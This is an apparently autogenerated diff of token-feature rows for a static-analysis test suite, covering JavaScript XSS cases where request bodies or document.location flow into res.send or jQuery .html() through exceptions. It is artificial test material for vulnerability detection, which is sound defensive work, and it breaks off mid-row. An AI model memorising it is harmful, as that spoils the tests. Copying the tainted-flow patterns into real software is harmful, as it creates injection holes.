autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val = j ... q.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val = j ... q.body) | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val = j ... q.body) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:11:22:44 | val = j ... q.body) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:25 | joiSchema | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:25 | joiSchema | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:25 | joiSchema | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:25 | joiSchema | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:25 | joiSchema | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:34 | joiSchema.validate | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:34 | joiSchema.validate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:34 | joiSchema.validate | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:34 | joiSchema.validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:34 | joiSchema.validate | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | exceptional return of joiSche ... q.body) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | exceptional return of joiSche ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | exceptional return of joiSche ... q.body) | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | exceptional return of joiSche ... q.body) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | exceptional return of joiSche ... q.body) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | joiSche ... q.body) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | joiSche ... q.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | joiSche ... q.body) | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | joiSche ... q.body) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:17:22:44 | joiSche ... q.body) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:27:22:34 | validate | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:27:22:34 | validate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:22:27:22:34 | validate | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:27:22:34 | validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:27:22:34 | validate | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:36:22:38 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:36:22:38 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:22:36:22:38 | req | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:36:22:38 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:36:22:38 | req | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:22:40:22:43 | body | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:22:40:22:43 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:22:40:22:43 | body | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:22:40:22:43 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:22:40:22:43 | body | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:11 | val | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:11 | val | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:11 | val | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:11 | val | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:11 | val | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:17 | val.error | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:17 | val.error | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:17 | val.error | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:17 | val.error | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:23:9:23:17 | val.error | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:23:13:23:17 | error | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:23:13:23:17 | error | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:23:13:23:17 | error | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:23:13:23:17 | error | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:23:13:23:17 | error | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:11 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:11 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:11 | res | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:11 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:11 | res | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:16 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:16 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:16 | res.send | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:16 | res.send | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:16 | res.send | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | exceptional return of res.send(val.error) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | exceptional return of res.send(val.error) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | exceptional return of res.send(val.error) | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | exceptional return of res.send(val.error) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | exceptional return of res.send(val.error) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | res.send(val.error) | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | res.send(val.error) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | res.send(val.error) | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | res.send(val.error) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:24:9:24:27 | res.send(val.error) | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:24:13:24:16 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:24:13:24:16 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:24:13:24:16 | send | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:24:13:24:16 | send | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:24:13:24:16 | send | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:20 | val | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:20 | val | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:20 | val | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:20 | val | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:20 | val | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:26 | val.error | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:26 | val.error | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:26 | val.error | contextFunctionInterfaces | | @@ -18783,6 +127637,146 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:26 | val.error | enclosingFunctionName | app.post#functionalargument | | autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:26 | val.error | fileImports | ajv express joi | | autogenerated/Xss/ExceptionXss/ajv.js:24:18:24:26 | val.error | receiverName | res | +| autogenerated/Xss/ExceptionXss/ajv.js:24:22:24:26 | error | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:24:22:24:26 | error | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/ajv.js:24:22:24:26 | error | enclosingFunctionBody | req res val joiSchema validate req body val error res send val error | +| autogenerated/Xss/ExceptionXss/ajv.js:24:22:24:26 | error | enclosingFunctionName | app.post#functionalargument | +| autogenerated/Xss/ExceptionXss/ajv.js:24:22:24:26 | error | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:1:1:0 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:1:1:0 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:1:1:1 | require | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:1:1:1 | require | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:1:109:2 | (functi ... \\n\\t}\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:1:109:2 | (functi ... \\n\\t}\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:1:109:2 | (functi ... \\n\\t}\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:1 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:1 | this | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:1 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:1 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | deep2 | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | deep2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | deep2 | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | deep2 | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | deep2 | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:1:2 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | 'arguments' object of anonymous function | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | 'arguments' object of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | exceptional return of anonymous function | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | functio ... ! \\n\\t}\\n} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | functio ... ! \\n\\t}\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | functio ... ! \\n\\t}\\n} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | return of anonymous function | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:1:2:109:1 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:8 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:8 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:8 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:8 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:8 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo = d ... ocation | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo = d ... ocation | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo = d ... ocation | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo = d ... ocation | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:6:2:28 | foo = d ... ocation | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:19 | document | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:19 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:19 | document | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:19 | document | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:19 | document | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:28 | document.location | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:28 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:28 | document.location | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:28 | document.location | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:12:2:28 | document.location | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:21:2:28 | location | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:21:2:28 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:21:2:28 | location | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:21:2:28 | location | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:2:21:2:28 | location | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:4:1 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:4:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:4:1 | this | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:4:1 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:4:1 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | 'arguments' object of function inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | 'arguments' object of function inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | 'arguments' object of function inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | 'arguments' object of function inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | 'arguments' object of function inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | exceptional return of function inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | exceptional return of function inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:4:2:6:2 | exceptional return of function inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe 